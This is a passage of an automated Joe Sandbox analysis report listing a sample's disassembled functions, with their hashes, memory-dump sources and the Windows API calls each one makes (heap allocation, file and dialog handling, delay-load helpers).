                • Opcode ID: 8a50c9bc198fb34117a00ac21acbc9e00cd0761eafc033967386fba67da6d097
                • Instruction ID: 2b42956f4293e28e1769ef0ca65e735d4c69336efb2194df2be0395b017b2341
                • Opcode Fuzzy Hash: 8a50c9bc198fb34117a00ac21acbc9e00cd0761eafc033967386fba67da6d097
                • Instruction Fuzzy Hash: 30216B71C04689AACF15DF95C9529EEBBB4AF29300F4004AEE809A3242DB356E06CB61
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 7cacb3d17e3043f0b1dfae2654f22ac1d6e2c1ce87f02017f989134cc6150a1e
                • Instruction ID: 762483c1af2ed373481f5115b844143e207d1e3a278a1eb2ef12f3df98a6cb6d
                • Opcode Fuzzy Hash: 7cacb3d17e3043f0b1dfae2654f22ac1d6e2c1ce87f02017f989134cc6150a1e
                • Instruction Fuzzy Hash: 6F118E73A10929ABCF22AEA8CC919EEB736BF98750F054116F804A7391DB349D10C7E0
                APIs
                  • Part of subcall function 001F85A9: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,001F8FD3,00000001,00000364,?,001F3713,00000050,?,00210EE8,00000200), ref: 001F85EA
                • _free.LIBCMT ref: 001FBBF6
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: AllocateHeap_free
                • String ID:
                • API String ID: 614378929-0
                • Opcode ID: aa7cfc08f8c271ce16935b528c62ef837d81ae20f42aba82ac1fb9d51323eae8
                • Instruction ID: 0b5c0525ba67ebfd31fc03e6225eb67d9a5bd009f0f617aaa9572f556a32d66a
                • Opcode Fuzzy Hash: aa7cfc08f8c271ce16935b528c62ef837d81ae20f42aba82ac1fb9d51323eae8
                • Instruction Fuzzy Hash: F701F97360430D6BE3358F65D88596AFBEDFB95370F25051DE69483280EB30A806C774
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
                • Instruction ID: 861cc20303893d178611d29d96bca70fb6eb1a38a6b8659a6999104be938d89a
                • Opcode Fuzzy Hash: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
                • Instruction Fuzzy Hash: D1F08C30500B069FDB30DE65C94162AB7E8EF21320F608A1BE496C3780E770D880C782
                APIs
                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,001F8FD3,00000001,00000364,?,001F3713,00000050,?,00210EE8,00000200), ref: 001F85EA
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: 405713e39d64fefecd42a78122700bdca18720ae6b8c182322894e7fb92fb637
                • Instruction ID: db6f95f506736df7de5090bada8bf7b2146990599e5ac6084cf5aa8c37905a36
                • Opcode Fuzzy Hash: 405713e39d64fefecd42a78122700bdca18720ae6b8c182322894e7fb92fb637
                • Instruction Fuzzy Hash: 2DF0E93164452D6BEB216F669C05B7B778CAF917B0B158111AF19E61E1CF30DD028AE4
                APIs
                • __EH_prolog.LIBCMT ref: 001D5BDC
                  • Part of subcall function 001DB07D: __EH_prolog.LIBCMT ref: 001DB082
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 31dbd79961b7ff7634a5e7e340f315a7893b475220f6e69c9700fe7004666ce5
                • Instruction ID: e4ebf0763eba6a86f01a83ab11a438420a628d017590f3baeed5e06107a792a4
                • Opcode Fuzzy Hash: 31dbd79961b7ff7634a5e7e340f315a7893b475220f6e69c9700fe7004666ce5
                • Instruction Fuzzy Hash: CC016D34A15684DAC725F7A4C0553EDF7A49F69700F41419EA85A53383CBB81B09C7A2
                APIs
                • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,001FC13D,00000000,?,001F67E2,?,00000008,?,001F89AD,?,?,?), ref: 001F854A
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: 4a6e4dd0b475cfc3f10a5c5ae29dd129e7c9730711bd4ddb3756f631ce9ad626
                • Instruction ID: a6fb481749a27f07344738120e9900e0f68a9cf21ab31ea92659dd0a42d56e8f
                • Opcode Fuzzy Hash: 4a6e4dd0b475cfc3f10a5c5ae29dd129e7c9730711bd4ddb3756f631ce9ad626
                • Instruction Fuzzy Hash: 8BE0656164426D5BEB3126696C05B7A77CCDF917B4F150220AF55EA0B1CF70CC0185F5
                APIs
                • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 001DA4F5
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: CloseFind
                • String ID:
                • API String ID: 1863332320-0
                • Opcode ID: 753af1fed442edd72126944a561a0718fe6e3690d250b671e3bce1b74749d8a4
                • Instruction ID: fb411ea3a67b95839eef43dc11493f1be0dda635e2c348fda2c6113b2c4af269
                • Opcode Fuzzy Hash: 753af1fed442edd72126944a561a0718fe6e3690d250b671e3bce1b74749d8a4
                • Instruction Fuzzy Hash: 15F0E9320093C0AACA229B7848447C67B956F25331F44CA0AF1FD02292C37414859723
                APIs
                • SetThreadExecutionState.KERNEL32(00000001), ref: 001E06B1
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: ExecutionStateThread
                • String ID:
                • API String ID: 2211380416-0
                • Opcode ID: 5867812170ff2dfa3c9ac8cf3465a9c6fe0439b749b8c211a98ad4df1a1bf208
                • Instruction ID: 6215921910cef71476302856ed68171832bc92d342e7f43ef06c39ae2808df7e
                • Opcode Fuzzy Hash: 5867812170ff2dfa3c9ac8cf3465a9c6fe0439b749b8c211a98ad4df1a1bf208
                • Instruction Fuzzy Hash: 9ED0C22420019025C6227326A84A7FE1B0A0FEA720F080023F00D53687CF9A08C652A2
                APIs
                • GdipAlloc.GDIPLUS(00000010), ref: 001E9D81
                  • Part of subcall function 001E9B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 001E9B30
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: Gdip$AllocBitmapCreateFromStream
                • String ID:
                • API String ID: 1915507550-0
                • Opcode ID: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                • Instruction ID: aac58a8093f82f52b56073af958a7908b5cf3b70473972a424b43a632daf4858
                • Opcode Fuzzy Hash: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                • Instruction Fuzzy Hash: 28D0A73061464DBADF40BEB28C0297E7BEDEB10300F008025BC0886141EFB1DE10A261
                APIs
                • GetFileType.KERNELBASE(000000FF,001D9887), ref: 001D9995
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: FileType
                • String ID:
                • API String ID: 3081899298-0
                • Opcode ID: 6db3dc2fdc6ceeb7e06d00bf8120ba8dbb900ffbdf7ffdcc19605a3682b10a6b
                • Instruction ID: 76c8d275e4df0ff625617579312ff391d913a2b835f9cd60a683106f2d7979ea
                • Opcode Fuzzy Hash: 6db3dc2fdc6ceeb7e06d00bf8120ba8dbb900ffbdf7ffdcc19605a3682b10a6b
                • Instruction Fuzzy Hash: 38D01231011241A58F2986345D5909A7756DB8336EB38D6A9D025C41A1D737C803F541
                APIs
                • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 001ED43F
                  • Part of subcall function 001EAC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 001EAC85
                  • Part of subcall function 001EAC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001EAC96
                  • Part of subcall function 001EAC74: IsDialogMessageW.USER32(0001043C,?), ref: 001EACAA
                  • Part of subcall function 001EAC74: TranslateMessage.USER32(?), ref: 001EACB8
                  • Part of subcall function 001EAC74: DispatchMessageW.USER32(?), ref: 001EACC2
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: Message$DialogDispatchItemPeekSendTranslate
                • String ID:
                • API String ID: 897784432-0
                • Opcode ID: 208bd934656b56217d7a8ab8b78592892d241ae23d8608075b208fe7cad3e874
                • Instruction ID: d8ed714ea7327639d82765dc82f5e8f0cdbc1a727d68e415828f7d9f17df1426
                • Opcode Fuzzy Hash: 208bd934656b56217d7a8ab8b78592892d241ae23d8608075b208fe7cad3e874
                • Instruction Fuzzy Hash: FFD09E31144300ABD6112B51DE06F0F7AE6AB98B04F404554B349750B2CA62AD21AB16
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 001ED8A3
                  • Part of subcall function 001EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001EDFD6
                  • Part of subcall function 001EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 85b32fe4541a2d702195fb4865e3d3edd45859e1b8673b23f2e453f8fde02ed2
                • Instruction ID: 62fade973dd760bc61d9958dd50ab4b8208e5d81c379bff8731c5c39560e7edc
                • Opcode Fuzzy Hash: 85b32fe4541a2d702195fb4865e3d3edd45859e1b8673b23f2e453f8fde02ed2
                • Instruction Fuzzy Hash: 19B012E527CB42BC320C61027D62C3F020CC4C1B11331452AF44DE00C2D6805C5D4431
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 001ED8A3
                  • Part of subcall function 001EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001EDFD6
                  • Part of subcall function 001EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: bb15d31e59831e7452f21c4a1c168ca94b77cc09ff663b56de74175de24a0e87
                • Instruction ID: 1264eca3ea7961a38d445bfdd6e825c40a89b4766e5b32fd5584cd3775293324
                • Opcode Fuzzy Hash: bb15d31e59831e7452f21c4a1c168ca94b77cc09ff663b56de74175de24a0e87
                • Instruction Fuzzy Hash: 6DB012E127C942AC320CA1067D12D3E020CC4C2B11330C01AF44DD02C2D6405C1E0431
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 001ED8A3
                  • Part of subcall function 001EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001EDFD6
                  • Part of subcall function 001EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 4819ebc993e49013e8ff9ec57eb3aaedfecf17e6e5014feee70dfc2866bb167b
                • Instruction ID: eca32afbc837c748ea18e1e8f9456182df4d2d94ecec200ff84a7292e2080cd7
                • Opcode Fuzzy Hash: 4819ebc993e49013e8ff9ec57eb3aaedfecf17e6e5014feee70dfc2866bb167b
                • Instruction Fuzzy Hash: B3B012E527CA42AC320CA1067D52D3F020CD4C1B11330401AF44DD01C2D7405C190531
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 001ED8A3
                  • Part of subcall function 001EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001EDFD6
                  • Part of subcall function 001EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: d2c168c6cda004c6695020f412e9287ac8b95ea3240b66bde1945364cb0990d7
                • Instruction ID: bd942b9dded016ea6689e58539fa9ddfad6c18b89f4b76056a791ff15d1fab65
                • Opcode Fuzzy Hash: d2c168c6cda004c6695020f412e9287ac8b95ea3240b66bde1945364cb0990d7
                • Instruction Fuzzy Hash: 42B012F137C942AC320CA1067D12E3E021CC4C2B11330801AF44DD01C2D6405C190431
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 001ED8A3
                  • Part of subcall function 001EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001EDFD6
                  • Part of subcall function 001EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 25b08f9a4b3dc7cd096624fd43bfc36c44bcc1bab40815e0a5c07253c6c2446a
                • Instruction ID: e689de40c5c19632c8248acbe7709603bca9a3baecd5c3b8f7c9baf36cafae31
                • Opcode Fuzzy Hash: 25b08f9a4b3dc7cd096624fd43bfc36c44bcc1bab40815e0a5c07253c6c2446a
                • Instruction Fuzzy Hash: AAB012E127C942AC320CA1077E12D3E020CC4C1B11330801AF04DD02C2D6405C1F1431
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 001ED8A3
                  • Part of subcall function 001EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001EDFD6
                  • Part of subcall function 001EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: a488f66754ef71a71fd0f885d193e179dd6a2bad01d51bd36eb53080a101bd23
                • Instruction ID: ebd22258209988b392eab42a6a8ba29d94813433ea80c3b898a46cdd539f7212
                • Opcode Fuzzy Hash: a488f66754ef71a71fd0f885d193e179dd6a2bad01d51bd36eb53080a101bd23
                • Instruction Fuzzy Hash: C1B012E127CA82AC324CA1067D12D3E020CC4C1B11331811AF04DD02C2D6805C9E0431
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 001ED8A3
                  • Part of subcall function 001EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001EDFD6
                  • Part of subcall function 001EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
